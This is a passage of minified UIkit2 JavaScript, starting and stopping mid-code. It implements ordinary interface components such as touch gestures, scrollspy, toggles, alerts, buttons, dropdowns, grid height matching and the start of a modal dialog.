o=window.pageXOffset,s=window.pageYOffset;(t.x!=o||t.y!=s)&&(t.dir.x=o!=t.x?o>t.x?1:-1:0,t.dir.y=s!=t.y?s>t.y?1:-1:0,t.x=o,t.y=s,i.$doc.trigger("scrolling.uk.document",[{dir:{x:t.dir.x,y:t.dir.y},x:o,y:s}])),cancelAnimationFrame(e),e=requestAnimationFrame(n)};return i.support.touch&&i.$html.on("touchmove touchend MSPointerMove MSPointerUp pointermove pointerup",n),(t.x||t.y)&&n(),n}());if(i.trigger("domready.uk.dom"),i.support.touch&&navigator.userAgent.match(/(iPad|iPhone|iPod)/g)&&i.$win.on("load orientationchange resize",i.Utils.debounce(function(){var i=function(){return t(".uk-height-viewport").css("height",window.innerHeight),i};return i()}(),100)),i.trigger("afterready.uk.dom"),i.domready=!0,i.support.mutationobserver){var n=i.Utils.debounce(function(){requestAnimationFrame(function(){i.init(document.body)})},10);new i.support.mutationobserver(function(t){var i=!1;t.every(function(t){if("childList"!=t.type)return!0;for(var e,n=0;n<t.addedNodes.length;++n)if(e=t.addedNodes[n],e.outerHTML&&-1!==e.outerHTML.indexOf("data-uk-"))return(i=!0)&&!1;return!0}),i&&n()}).observe(document.body,{childList:!0,subtree:!0})}};return("complete"==document.readyState||"interactive"==document.readyState)&&setTimeout(e),e}()),i.$html.addClass(i.support.touch?"uk-touch":"uk-notouch"),i.support.touch){var n,o=!1,s="uk-hover",a=".uk-overlay, .uk-overlay-hover, .uk-overlay-toggle, .uk-animation-hover, .uk-has-hover";i.$html.on("mouseenter touchstart MSPointerDown pointerdown",a,function(){o&&t("."+s).removeClass(s),o=t(this).addClass(s)}).on("mouseleave touchend MSPointerUp pointerup",function(i){n=t(i.target).parents(a),o&&o.not(n).removeClass(s)})}return i}),function(t){function i(t,i,e,n){return Math.abs(t-i)>=Math.abs(e-n)?t-i>0?"Left":"Right":e-n>0?"Up":"Down"}function e(){c=null,d.last&&(void 0!==d.el&&d.el.trigger("longTap"),d={})}function n(){c&&clearTimeout(c),c=null}function o(){a&&clearTimeout(a),r&&clearTimeout(r),l&&clearTimeout(l),c&&clearTimeout(c),a=r=l=c=null,d={}}function s(t){return t.pointerType==t.MSPOINTER_TYPE_TOUCH&&t.isPrimary}if(!t.fn.swipeLeft){var a,r,l,c,u,d={},h=750,p="ontouchstart"in window,f=window.PointerEvent,m=p||window.DocumentTouch&&document instanceof DocumentTouch||navigator.msPointerEnabled&&navigator.msMaxTouchPoints>0||navigator.pointerEnabled&&navigator.maxTouchPoints>0;t(function(){var g,v,k,w=0,b=0;"MSGesture"in window&&(u=new MSGesture,u.target=document.body),t(document).on("MSGestureEnd gestureend",function(t){var i=t.originalEvent.velocityX>1?"Right":t.originalEvent.velocityX<-1?"Left":t.originalEvent.velocityY>1?"Down":t.originalEvent.velocityY<-1?"Up":null;i&&void 0!==d.el&&(d.el.trigger("swipe"),d.el.trigger("swipe"+i))}).on("touchstart MSPointerDown pointerdown",function(i){("MSPointerDown"!=i.type||s(i.originalEvent))&&(k="MSPointerDown"==i.type||"pointerdown"==i.type?i:i.originalEvent.touches[0],g=Date.now(),v=g-(d.last||g),d.el=t("tagName"in k.target?k.target:k.target.parentNode),a&&clearTimeout(a),d.x1=k.pageX,d.y1=k.pageY,v>0&&250>=v&&(d.isDoubleTap=!0),d.last=g,c=setTimeout(e,h),i.originalEvent&&i.originalEvent.pointerId&&u&&("MSPointerDown"==i.type||"pointerdown"==i.type||"touchstart"==i.type)&&u.addPointer(i.originalEvent.pointerId))}).on("touchmove MSPointerMove pointermove",function(t){("MSPointerMove"!=t.type||s(t.originalEvent))&&(k="MSPointerMove"==t.type||"pointermove"==t.type?t:t.originalEvent.touches[0],n(),d.x2=k.pageX,d.y2=k.pageY,w+=Math.abs(d.x1-d.x2),b+=Math.abs(d.y1-d.y2))}).on("touchend MSPointerUp pointerup",function(e){("MSPointerUp"!=e.type||s(e.originalEvent))&&(n(),d.x2&&Math.abs(d.x1-d.x2)>30||d.y2&&Math.abs(d.y1-d.y2)>30?l=setTimeout(function(){void 0!==d.el&&(d.el.trigger("swipe"),d.el.trigger("swipe"+i(d.x1,d.x2,d.y1,d.y2))),d={}},0):"last"in d&&(isNaN(w)||30>w&&30>b?r=setTimeout(function(){var i=t.Event("tap");i.cancelTouch=o,void 0!==d.el&&d.el.trigger(i),d.isDoubleTap?(void 0!==d.el&&d.el.trigger("doubleTap"),d={}):a=setTimeout(function(){a=null,void 0!==d.el&&d.el.trigger("singleTap"),d={}},250)},0):d={},w=b=0))}).on("touchcancel MSPointerCancel pointercancel",function(t){("touchcancel"==t.type&&p&&m||!p&&"pointercancel"==t.type&&f)&&o()}),t(window).on("scroll",o)}),["swipe","swipeLeft","swipeRight","swipeUp","swipeDown","doubleTap","tap","singleTap","longTap"].forEach(function(i){t.fn[i]=function(e){return t(this).on(i,e)}})}}(jQuery),function(t){"use strict";var i=[];t.component("stackMargin",{defaults:{cls:"uk-margin-small-top",rowfirst:!1,observe:!1},boot:function(){t.ready(function(i){t.$("[data-uk-margin]",i).each(function(){var i=t.$(this);i.data("stackMargin")||t.stackMargin(i,t.Utils.options(i.attr("data-uk-margin")))})})},init:function(){var e=this;t.$win.on("resize orientationchange",function(){var i=function(){e.process()};return t.$(function(){i(),t.$win.on("load",i)}),t.Utils.debounce(i,20)}()),this.on("display.uk.check",function(){this.element.is(":visible")&&this.process()}.bind(this)),this.options.observe&&t.domObserve(this.element,function(){e.element.is(":visible")&&e.process()}),i.push(this)},process:function(){var i=this.element.children();if(t.Utils.stackMargin(i,this.options),!this.options.rowfirst||!i.length)return this;var e={},n=!1;return i.removeClass(this.options.rowfirst).each(function(i,o){o=t.$(this),"none"!=this.style.display&&(i=o.offset().left,((e[i]=e[i]||[])&&e[i]).push(this),n=n===!1?i:Math.min(n,i))}),t.$(e[n]).addClass(this.options.rowfirst),this}}),function(){var i=[],e=function(t){if(t.is(":visible")){var i=t.parent().width(),e=t.data("width"),n=i/e,o=Math.floor(n*t.data("height"));t.css({height:e>i?o:t.data("height")})}};t.component("responsiveElement",{defaults:{},boot:function(){t.ready(function(i){t.$("iframe.uk-responsive-width, [data-uk-responsive]",i).each(function(){var i,e=t.$(this);e.data("responsiveElement")||(i=t.responsiveElement(e,{}))})})},init:function(){var t=this.element;t.attr("width")&&t.attr("height")&&(t.data({width:t.attr("width"),height:t.attr("height")}).on("display.uk.check",function(){e(t)}),e(t),i.push(t))}}),t.$win.on("resize load",t.Utils.debounce(function(){i.forEach(function(t){e(t)})},15))}(),t.Utils.stackMargin=function(i,e){e=t.$.extend({cls:"uk-margin-small-top"},e),i=t.$(i).removeClass(e.cls);var n=!1;i.each(function(i,e,o,s){s=t.$(this),"none"!=s.css("display")&&(i=s.offset(),e=s.outerHeight(),o=i.top+e,s.data({ukMarginPos:o,ukMarginTop:i.top}),(n===!1||i.top<n.top)&&(n={top:i.top,left:i.left,pos:o}))}).each(function(i){i=t.$(this),"none"!=i.css("display")&&i.data("ukMarginTop")>n.top&&i.data("ukMarginPos")>n.pos&&i.addClass(e.cls)})},t.Utils.matchHeights=function(i,e){i=t.$(i).css("min-height",""),e=t.$.extend({row:!0},e);var n=function(i){if(!(i.length<2)){var e=0;i.each(function(){e=Math.max(e,t.$(this).outerHeight())}).each(function(){var i=t.$(this),n=e-("border-box"==i.css("box-sizing")?0:i.outerHeight()-i.height());i.css("min-height",n+"px")})}};e.row?(i.first().width(),setTimeout(function(){var e=!1,o=[];i.each(function(){var i=t.$(this),s=i.offset().top;s!=e&&o.length&&(n(t.$(o)),o=[],s=i.offset().top),o.push(i),e=s}),o.length&&n(t.$(o))},0)):n(i)},function(i){t.Utils.inlineSvg=function(e,n){t.$(e||'img[src$=".svg"]',n||document).each(function(){var e=t.$(this),n=e.attr("src");if(!i[n]){var o=t.$.Deferred();t.$.get(n,{nc:Math.random()},function(i){o.resolve(t.$(i).find("svg"))}),i[n]=o.promise()}i[n].then(function(i){var n=t.$(i).clone();e.attr("id")&&n.attr("id",e.attr("id")),e.attr("class")&&n.attr("class",e.attr("class")),e.attr("style")&&n.attr("style",e.attr("style")),e.attr("width")&&(n.attr("width",e.attr("width")),e.attr("height")||n.removeAttr("height")),e.attr("height")&&(n.attr("height",e.attr("height")),e.attr("width")||n.removeAttr("width")),e.replaceWith(n)})})},t.ready(function(i){t.Utils.inlineSvg("[data-uk-svg]",i)})}({}),t.Utils.getCssVar=function(t){var i,e=document.documentElement,n=e.appendChild(document.createElement("div"));n.classList.add("var-"+t);try{i=JSON.parse(i=getComputedStyle(n,":before").content.replace(/^["'](.*)["']$/,"$1"))}catch(o){i=void 0}return e.removeChild(n),i}}(UIkit2),function(t){"use strict";function i(i,e){e=t.$.extend({duration:1e3,transition:"easeOutExpo",offset:0,complete:function(){}},e);var n=i.offset().top-e.offset,o=t.$doc.height(),s=window.innerHeight;n+s>o&&(n=o-s),t.$("html,body").stop().animate({scrollTop:n},e.duration,e.transition).promise().done(e.complete)}t.component("smoothScroll",{boot:function(){t.$html.on("click.smooth-scroll.uikit","[data-uk-smooth-scroll]",function(){var i=t.$(this);if(!i.data("smoothScroll")){{t.smoothScroll(i,t.Utils.options(i.attr("data-uk-smooth-scroll")))}i.trigger("click")}return!1})},init:function(){var e=this;this.on("click",function(n){n.preventDefault(),i(t.$(this.hash).length?t.$(this.hash):t.$("body"),e.options)})}}),t.Utils.scrollToElement=i,t.$.easing.easeOutExpo||(t.$.easing.easeOutExpo=function(t,i,e,n,o){return i==o?e+n:n*(-Math.pow(2,-10*i/o)+1)+e})}(UIkit2),function(t){"use strict";var i=t.$win,e=t.$doc,n=[],o=function(){for(var t=0;t<n.length;t++)window.requestAnimationFrame.apply(window,[n[t].check])};t.component("scrollspy",{defaults:{target:!1,cls:"uk-scrollspy-inview",initcls:"uk-scrollspy-init-inview",topoffset:0,leftoffset:0,repeat:!1,delay:0},boot:function(){e.on("scrolling.uk.document",o),i.on("load resize orientationchange",t.Utils.debounce(o,50)),t.ready(function(i){t.$("[data-uk-scrollspy]",i).each(function(){var i=t.$(this);if(!i.data("scrollspy")){t.scrollspy(i,t.Utils.options(i.attr("data-uk-scrollspy")))}})})},init:function(){var i,e=this,o=this.options.cls.split(/,/),s=function(){var n=e.options.target?e.element.find(e.options.target):e.element,s=1===n.length?1:0,a=0;n.each(function(){var n=t.$(this),r=n.data("inviewstate"),l=t.Utils.isInView(n,e.options),c=n.attr("data-uk-scrollspy-cls")||o[a].trim();!l||r||n.data("scrollspy-idle")||(i||(n.addClass(e.options.initcls),e.offset=n.offset(),i=!0,n.trigger("init.uk.scrollspy")),n.data("scrollspy-idle",setTimeout(function(){n.addClass("uk-scrollspy-inview").toggleClass(c).width(),n.trigger("inview.uk.scrollspy"),n.data("scrollspy-idle",!1),n.data("inviewstate",!0)},e.options.delay*s)),s++),!l&&r&&e.options.repeat&&(n.data("scrollspy-idle")&&(clearTimeout(n.data("scrollspy-idle")),n.data("scrollspy-idle",!1)),n.removeClass("uk-scrollspy-inview").toggleClass(c),n.data("inviewstate",!1),n.trigger("outview.uk.scrollspy")),a=o[a+1]?a+1:0})};s(),this.check=s,n.push(this)}});var s=[],a=function(){for(var t=0;t<s.length;t++)window.requestAnimationFrame.apply(window,[s[t].check])};t.component("scrollspynav",{defaults:{cls:"uk-active",closest:!1,topoffset:0,leftoffset:0,smoothscroll:!1},boot:function(){e.on("scrolling.uk.document",a),i.on("resize orientationchange",t.Utils.debounce(a,50)),t.ready(function(i){t.$("[data-uk-scrollspy-nav]",i).each(function(){var i=t.$(this);if(!i.data("scrollspynav")){t.scrollspynav(i,t.Utils.options(i.attr("data-uk-scrollspy-nav")))}})})},init:function(){var e,n=[],o=this.find("a[href^='#']").each(function(){"#"!==this.getAttribute("href").trim()&&n.push(this.getAttribute("href"))}),a=t.$(n.join(",")),r=this.options.cls,l=this.options.closest||this.options.closest,c=this,u=function(){e=[];for(var n=0;n<a.length;n++)t.Utils.isInView(a.eq(n),c.options)&&e.push(a.eq(n));if(e.length){var s,u=i.scrollTop(),d=function(){for(var t=0;t<e.length;t++)if(e[t].offset().top-c.options.topoffset>=u)return e[t]}();if(!d)return;c.options.closest?(o.blur().closest(l).removeClass(r),s=o.filter("a[href='#"+d.attr("id")+"']").closest(l).addClass(r)):s=o.removeClass(r).filter("a[href='#"+d.attr("id")+"']").addClass(r),c.element.trigger("inview.uk.scrollspynav",[d,s])}};this.options.smoothscroll&&t.smoothScroll&&o.each(function(){t.smoothScroll(this,c.options.smoothscroll)}),u(),this.element.data("scrollspynav",this),this.check=u,s.push(this)}})}(UIkit2),function(t){"use strict";var i=[];t.component("toggle",{defaults:{target:!1,cls:"uk-hidden",animation:!1,duration:200},boot:function(){t.ready(function(e){t.$("[data-uk-toggle]",e).each(function(){var i=t.$(this);if(!i.data("toggle")){t.toggle(i,t.Utils.options(i.attr("data-uk-toggle")))}}),setTimeout(function(){i.forEach(function(t){t.getToggles()})},0)})},init:function(){var t=this;this.aria=-1!==this.options.cls.indexOf("uk-hidden"),this.on("click",function(i){t.element.is('a[href="#"]')&&i.preventDefault(),t.toggle()}),i.push(this)},toggle:function(){if(this.getToggles(),this.totoggle.length){if(this.options.animation&&t.support.animation){var i=this,e=this.options.animation.split(",");1==e.length&&(e[1]=e[0]),e[0]=e[0].trim(),e[1]=e[1].trim(),this.totoggle.css("animation-duration",this.options.duration+"ms"),this.totoggle.each(function(){var n=t.$(this);n.hasClass(i.options.cls)?(n.toggleClass(i.options.cls),t.Utils.animate(n,e[0]).then(function(){n.css("animation-duration",""),t.Utils.checkDisplay(n)})):t.Utils.animate(this,e[1]+" uk-animation-reverse").then(function(){n.toggleClass(i.options.cls).css("animation-duration",""),t.Utils.checkDisplay(n)})})}else this.totoggle.toggleClass(this.options.cls),t.Utils.checkDisplay(this.totoggle);this.updateAria()}},getToggles:function(){this.totoggle=this.options.target?t.$(this.options.target):[],this.updateAria()},updateAria:function(){this.aria&&this.totoggle.length&&this.totoggle.not("[aria-hidden]").each(function(){t.$(this).attr("aria-hidden",t.$(this).hasClass("uk-hidden"))})}})}(UIkit2),function(t){"use strict";t.component("alert",{defaults:{fade:!0,duration:200,trigger:".uk-alert-close"},boot:function(){t.$html.on("click.alert.uikit","[data-uk-alert]",function(i){var e=t.$(this);if(!e.data("alert")){var n=t.alert(e,t.Utils.options(e.attr("data-uk-alert")));t.$(i.target).is(n.options.trigger)&&(i.preventDefault(),n.close())}})},init:function(){var t=this;this.on("click",this.options.trigger,function(i){i.preventDefault(),t.close()})},close:function(){var t=this.trigger("close.uk.alert"),i=function(){this.trigger("closed.uk.alert").remove()}.bind(this);this.options.fade?t.css("overflow","hidden").css("max-height",t.height()).animate({height:0,opacity:0,paddingTop:0,paddingBottom:0,marginTop:0,marginBottom:0},this.options.duration,i):i()}})}(UIkit2),function(t){"use strict";t.component("buttonRadio",{defaults:{activeClass:"uk-active",target:".uk-button"},boot:function(){t.$html.on("click.buttonradio.uikit","[data-uk-button-radio]",function(i){var e=t.$(this);if(!e.data("buttonRadio")){var n=t.buttonRadio(e,t.Utils.options(e.attr("data-uk-button-radio"))),o=t.$(i.target);o.is(n.options.target)&&o.trigger("click")}})},init:function(){var i=this;this.find(i.options.target).attr("aria-checked","false").filter("."+i.options.activeClass).attr("aria-checked","true"),this.on("click",this.options.target,function(e){var n=t.$(this);n.is('a[href="#"]')&&e.preventDefault(),i.find(i.options.target).not(n).removeClass(i.options.activeClass).blur(),n.addClass(i.options.activeClass),i.find(i.options.target).not(n).attr("aria-checked","false"),n.attr("aria-checked","true"),i.trigger("change.uk.button",[n])})},getSelected:function(){return this.find("."+this.options.activeClass)}}),t.component("buttonCheckbox",{defaults:{activeClass:"uk-active",target:".uk-button"},boot:function(){t.$html.on("click.buttoncheckbox.uikit","[data-uk-button-checkbox]",function(i){var e=t.$(this);if(!e.data("buttonCheckbox")){var n=t.buttonCheckbox(e,t.Utils.options(e.attr("data-uk-button-checkbox"))),o=t.$(i.target);o.is(n.options.target)&&o.trigger("click")}})},init:function(){var i=this;this.find(i.options.target).attr("aria-checked","false").filter("."+i.options.activeClass).attr("aria-checked","true"),this.on("click",this.options.target,function(e){var n=t.$(this);n.is('a[href="#"]')&&e.preventDefault(),n.toggleClass(i.options.activeClass).blur(),n.attr("aria-checked",n.hasClass(i.options.activeClass)),i.trigger("change.uk.button",[n])})},getSelected:function(){return this.find("."+this.options.activeClass)}}),t.component("button",{defaults:{},boot:function(){t.$html.on("click.button.uikit","[data-uk-button]",function(){var i=t.$(this);if(!i.data("button")){{t.button(i,t.Utils.options(i.attr("data-uk-button")))}i.trigger("click")}})},init:function(){var t=this;this.element.attr("aria-pressed",this.element.hasClass("uk-active")),this.on("click",function(i){t.element.is('a[href="#"]')&&i.preventDefault(),t.toggle(),t.trigger("change.uk.button",[t.element.blur().hasClass("uk-active")])})},toggle:function(){this.element.toggleClass("uk-active"),this.element.attr("aria-pressed",this.element.hasClass("uk-active"))}})}(UIkit2),function(t){"use strict";function i(i,e,n,o){if(i=t.$(i),e=t.$(e),n=n||window.innerWidth,o=o||i.offset(),e.length){var s=e.outerWidth();if(i.css("min-width",s),"right"==t.langdirection){var a=n-(e.offset().left+s),r=n-(i.offset().left+i.outerWidth());i.css("margin-right",a-r)}else i.css("margin-left",e.offset().left-o.left)}}var e,n=!1,o={x:{"bottom-left":"bottom-right","bottom-right":"bottom-left","bottom-center":"bottom-center","top-left":"top-right","top-right":"top-left","top-center":"top-center","left-top":"right-top","left-bottom":"right-bottom","left-center":"right-center","right-top":"left-top","right-bottom":"left-bottom","right-center":"left-center"},y:{"bottom-left":"top-left","bottom-right":"top-right","bottom-center":"top-center","top-left":"bottom-left","top-right":"bottom-right","top-center":"bottom-center","left-top":"left-bottom","left-bottom":"left-top","left-center":"left-center","right-top":"right-bottom","right-bottom":"right-top","right-center":"right-center"},xy:{"bottom-left":"top-right","bottom-right":"top-left","bottom-center":"top-center","top-left":"bottom-right","top-right":"bottom-left","top-center":"bottom-center","left-top":"right-bottom","left-bottom":"right-top","left-center":"right-center","right-top":"left-bottom","right-bottom":"left-top","right-center":"left-center"}};t.component("dropdown",{defaults:{mode:"hover",pos:"bottom-left",offset:0,remaintime:800,justify:!1,boundary:t.$win,delay:0,dropdownSelector:".uk-dropdown,.uk-dropdown-blank",hoverDelayIdle:250,preventflip:!1},remainIdle:!1,boot:function(){var i=t.support.touch?"click":"mouseenter";t.$html.on(i+".dropdown.uikit focus pointerdown","[data-uk-dropdown]",function(e){var n=t.$(this);if(!n.data("dropdown")){var o=t.dropdown(n,t.Utils.options(n.attr("data-uk-dropdown")));("click"==e.type||"mouseenter"==e.type&&"hover"==o.options.mode)&&o.element.trigger(i),o.dropdown.length&&e.preventDefault()}})},init:function(){var i=this;this.dropdown=this.find(this.options.dropdownSelector),this.offsetParent=this.dropdown.parents().filter(function(){return-1!==t.$.inArray(t.$(this).css("position"),["relative","fixed","absolute"])}).slice(0,1),this.offsetParent.length||(this.offsetParent=this.element),this.centered=this.dropdown.hasClass("uk-dropdown-center"),this.justified=this.options.justify?t.$(this.options.justify):!1,this.boundary=t.$(this.options.boundary),this.boundary.length||(this.boundary=t.$win),this.dropdown.hasClass("uk-dropdown-up")&&(this.options.pos="top-left"),this.dropdown.hasClass("uk-dropdown-flip")&&(this.options.pos=this.options.pos.replace("left","right")),this.dropdown.hasClass("uk-dropdown-center")&&(this.options.pos=this.options.pos.replace(/(left|right)/,"center")),this.element.attr("aria-haspopup","true"),this.element.attr("aria-expanded",this.element.hasClass("uk-open")),this.dropdown.attr("aria-hidden","true"),"click"==this.options.mode||t.support.touch?this.on("click.uk.dropdown",function(e){var n=t.$(e.target);n.parents(i.options.dropdownSelector).length||((n.is("a[href='#']")||n.parent().is("a[href='#']")||i.dropdown.length&&!i.dropdown.is(":visible"))&&e.preventDefault(),n.blur()),i.element.hasClass("uk-open")?(!i.dropdown.find(e.target).length||n.is(".uk-dropdown-close")||n.parents(".uk-dropdown-close").length)&&i.hide():i.show()}):this.on("mouseenter",function(){i.trigger("pointerenter.uk.dropdown",[i]),i.remainIdle&&clearTimeout(i.remainIdle),e&&clearTimeout(e),n&&n==i||(e=n&&n!=i?setTimeout(function(){e=setTimeout(i.show.bind(i),i.options.delay)},i.options.hoverDelayIdle):setTimeout(i.show.bind(i),i.options.delay))}).on("mouseleave",function(){e&&clearTimeout(e),i.remainIdle=setTimeout(function(){n&&n==i&&i.hide()},i.options.remaintime),i.trigger("pointerleave.uk.dropdown",[i])}).on("click",function(e){var o=t.$(e.target);return i.remainIdle&&clearTimeout(i.remainIdle),n&&n==i?((!i.dropdown.find(e.target).length||o.is(".uk-dropdown-close")||o.parents(".uk-dropdown-close").length)&&i.hide(),void 0):((o.is("a[href='#']")||o.parent().is("a[href='#']"))&&e.preventDefault(),i.show(),void 0)})},show:function(){t.$html.off("click.outer.dropdown"),n&&n!=this&&n.hide(!0),e&&clearTimeout(e),this.trigger("beforeshow.uk.dropdown",[this]),this.checkDimensions(),this.element.addClass("uk-open"),this.element.attr("aria-expanded","true"),this.dropdown.attr("aria-hidden","false"),this.trigger("show.uk.dropdown",[this]),t.Utils.checkDisplay(this.dropdown,!0),t.Utils.focus(this.dropdown),n=this,this.registerOuterClick()},hide:function(t){this.trigger("beforehide.uk.dropdown",[this,t]),this.element.removeClass("uk-open"),this.remainIdle&&clearTimeout(this.remainIdle),this.remainIdle=!1,this.element.attr("aria-expanded","false"),this.dropdown.attr("aria-hidden","true"),this.trigger("hide.uk.dropdown",[this,t]),n==this&&(n=!1)},registerOuterClick:function(){var i=this;t.$html.off("click.outer.dropdown"),setTimeout(function(){t.$html.on("click.outer.dropdown",function(o){e&&clearTimeout(e);t.$(o.target);n!=i||i.element.find(o.target).length||(i.hide(!0),t.$html.off("click.outer.dropdown"))})},10)},checkDimensions:function(){if(this.dropdown.length){this.dropdown.removeClass("uk-dropdown-top uk-dropdown-bottom uk-dropdown-left uk-dropdown-right uk-dropdown-stack uk-dropdown-autoflip").css({topLeft:"",left:"",marginLeft:"",marginRight:""}),this.justified&&this.justified.length&&this.dropdown.css("min-width","");var e,n=t.$.extend({},this.offsetParent.offset(),{width:this.offsetParent[0].offsetWidth,height:this.offsetParent[0].offsetHeight}),s=this.options.offset,a=this.dropdown,r=(a.show().offset()||{left:0,top:0},a.outerWidth()),l=a.outerHeight(),c=this.boundary.width(),u=(this.boundary[0]!==window&&this.boundary.offset()?this.boundary.offset():{top:0,left:0},this.options.pos),d={"bottom-left":{top:0+n.height+s,left:0},"bottom-right":{top:0+n.height+s,left:0+n.width-r},"bottom-center":{top:0+n.height+s,left:0+n.width/2-r/2},"top-left":{top:0-l-s,left:0},"top-right":{top:0-l-s,left:0+n.width-r},"top-center":{top:0-l-s,left:0+n.width/2-r/2},"left-top":{top:0,left:0-r-s},"left-bottom":{top:0+n.height-l,left:0-r-s},"left-center":{top:0+n.height/2-l/2,left:0-r-s},"right-top":{top:0,left:0+n.width+s},"right-bottom":{top:0+n.height-l,left:0+n.width+s},"right-center":{top:0+n.height/2-l/2,left:0+n.width+s}},h={};
if(e=u.split("-"),h=d[u]?d[u]:d["bottom-left"],this.justified&&this.justified.length)i(a.css({left:0}),this.justified,c);else if(this.options.preventflip!==!0){var p;switch(this.checkBoundary(n.left+h.left,n.top+h.top,r,l,c)){case"x":"x"!==this.options.preventflip&&(p=o.x[u]||"right-top");break;case"y":"y"!==this.options.preventflip&&(p=o.y[u]||"top-left");break;case"xy":this.options.preventflip||(p=o.xy[u]||"right-bottom")}p&&(e=p.split("-"),h=d[p]?d[p]:d["bottom-left"],a.addClass("uk-dropdown-autoflip"),this.checkBoundary(n.left+h.left,n.top+h.top,r,l,c)&&(e=u.split("-"),h=d[u]?d[u]:d["bottom-left"]))}r>c&&(a.addClass("uk-dropdown-stack"),this.trigger("stack.uk.dropdown",[this])),a.css(h).css("display","").addClass("uk-dropdown-"+e[0])}},checkBoundary:function(i,e,n,o,s){var a="";return(0>i||i-t.$win.scrollLeft()+n>s)&&(a+="x"),(e-t.$win.scrollTop()<0||e-t.$win.scrollTop()+o>window.innerHeight)&&(a+="y"),a}}),t.component("dropdownOverlay",{defaults:{justify:!1,cls:"",duration:200},boot:function(){t.ready(function(i){t.$("[data-uk-dropdown-overlay]",i).each(function(){var i=t.$(this);i.data("dropdownOverlay")||t.dropdownOverlay(i,t.Utils.options(i.attr("data-uk-dropdown-overlay")))})})},init:function(){var e=this;this.justified=this.options.justify?t.$(this.options.justify):!1,this.overlay=this.element.find("uk-dropdown-overlay"),this.overlay.length||(this.overlay=t.$('<div class="uk-dropdown-overlay"></div>').appendTo(this.element)),this.overlay.addClass(this.options.cls),this.on({"beforeshow.uk.dropdown":function(t,n){e.dropdown=n,e.justified&&e.justified.length&&i(e.overlay.css({display:"block",marginLeft:"",marginRight:""}),e.justified,e.justified.outerWidth())},"show.uk.dropdown":function(){var i=e.dropdown.dropdown.outerHeight(!0);e.dropdown.element.removeClass("uk-open"),e.overlay.stop().css("display","block").animate({height:i},e.options.duration,function(){e.dropdown.dropdown.css("visibility",""),e.dropdown.element.addClass("uk-open"),t.Utils.checkDisplay(e.dropdown.dropdown,!0)}),e.pointerleave=!1},"hide.uk.dropdown":function(){e.overlay.stop().animate({height:0},e.options.duration)},"pointerenter.uk.dropdown":function(){clearTimeout(e.remainIdle)},"pointerleave.uk.dropdown":function(){e.pointerleave=!0}}),this.overlay.on({mouseenter:function(){e.remainIdle&&(clearTimeout(e.dropdown.remainIdle),clearTimeout(e.remainIdle))},mouseleave:function(){e.pointerleave&&n&&(e.remainIdle=setTimeout(function(){n&&n.hide()},n.options.remaintime))}})}})}(UIkit2),function(t){"use strict";var i=[];t.component("gridMatchHeight",{defaults:{target:!1,row:!0,ignorestacked:!1,observe:!1},boot:function(){t.ready(function(i){t.$("[data-uk-grid-match]",i).each(function(){var i,e=t.$(this);e.data("gridMatchHeight")||(i=t.gridMatchHeight(e,t.Utils.options(e.attr("data-uk-grid-match"))))})})},init:function(){var e=this;this.columns=this.element.children(),this.elements=this.options.target?this.find(this.options.target):this.columns,this.columns.length&&(t.$win.on("load resize orientationchange",function(){var i=function(){e.element.is(":visible")&&e.match()};return t.$(function(){i()}),t.Utils.debounce(i,50)}()),this.options.observe&&t.domObserve(this.element,function(){e.element.is(":visible")&&e.match()}),this.on("display.uk.check",function(){this.element.is(":visible")&&this.match()}.bind(this)),i.push(this))},match:function(){var i=this.columns.filter(":visible:first");if(i.length){var e=Math.ceil(100*parseFloat(i.css("width"))/parseFloat(i.parent().css("width")))>=100;return e&&!this.options.ignorestacked?this.revert():t.Utils.matchHeights(this.elements,this.options),this}},revert:function(){return this.elements.css("min-height",""),this}}),t.component("gridMargin",{defaults:{cls:"uk-grid-margin",rowfirst:"uk-row-first"},boot:function(){t.ready(function(i){t.$("[data-uk-grid-margin]",i).each(function(){var i,e=t.$(this);e.data("gridMargin")||(i=t.gridMargin(e,t.Utils.options(e.attr("data-uk-grid-margin"))))})})},init:function(){t.stackMargin(this.element,this.options)}})}(UIkit2),function(t){"use strict";function i(i,e){return e?("object"==typeof i?(i=i instanceof jQuery?i:t.$(i),i.parent().length&&(e.persist=i,e.persist.data("modalPersistParent",i.parent()))):i="string"==typeof i||"number"==typeof i?t.$("<div></div>").html(i):t.$("<div></div>").html("UIkit2.modal Error: Unsupported data type: "+typeof i),i.appendTo(e.element.find(".uk-modal-dialog")),e):void 0}var e,n=!1,o=0,s=t.$html;t.$win.on("resize orientationchange",t.Utils.debounce(function(){t.$(".uk-modal.uk-open").each(function(){return t.$(this).data("modal")&&t.$(this).data("modal").resize()})},150)),t.component("modal",{defaults:{keyboard:!0,bgclose:!0,minScrollHeight:150,center:!1,modal:!0},scrollable:!1,transition:!1,hasTransitioned:!0,init:function(){if(e||(e=t.$("body")),this.element.length){var i=this;this.paddingdir="padding-"+("left"==t.langdirection?"right":"left"),this.dialog=this.find(".uk-modal-dialog"),this.active=!1,this.element.attr("aria-hidden",this.element.hasClass("uk-open")),this.on("click",".uk-modal-close",function(t){t.preventDefault(),i.hide()}).on("click",function(e){var n=t.$(e.target);n[0]==i.element[0]&&i.options.bgclose&&i.hide()}),t.domObserve(this.element,function(){i.resize()})}},toggle:function(){return this[this.isActive()?"hide":"show"]()},show:function(){if(this.element.length){var i=this;if(!this.isActive())return this.options.modal&&n&&n.hide(!0),this.element.removeClass("uk-open").show(),this.resize(!0),this.options.modal&&(n=this),this.active=!0,o++,t.support.transition?(this.hasTransitioned=!1,this.element.one(t.support.transition.end,function(){i.hasTransitioned=!0,t.Utils.focus(i.dialog,"a[href]")}).addClass("uk-open")):(this.element.addClass("uk-open"),t.Utils.focus(this.dialog,"a[href]")),s.addClass("uk-modal-page").height(),this.element.attr("aria-hidden","false"),this.element.trigger("show.uk.modal"),t.Utils.checkDisplay(this.dialog,!0),this}},hide:function(i){if(!i&&t.support.transition&&this.hasTransitioned){var e=this;this.one(t.support.transition.end,function(){e._hide()}).removeClass("uk-open")}else this._hide();return this},resize:function(t){if(this.isActive()||t){var i=e.width();if(this.scrollbarwidth=window.innerWidth-i,e.css(this.paddingdir,this.scrollbarwidth),this.element.css("overflow-y",this.scrollbarwidth?"scroll":"auto"),!this.updateScrollable()&&this.options.center){var n=this.dialog.outerHeight(),o=parseInt(this.dialog.css("margin-top"),10)+parseInt(this.dialog.css("margin-bottom"),10);n+o<window.innerHeight?this.dialog.css({top:window.innerHeight/2-n/2-o}):this.dialog.css({top:""})}}},updateScrollable:function(){var t=this.dialog.find(".uk-overflow-container:visible:first");if(t.length){t.css("height",0);var 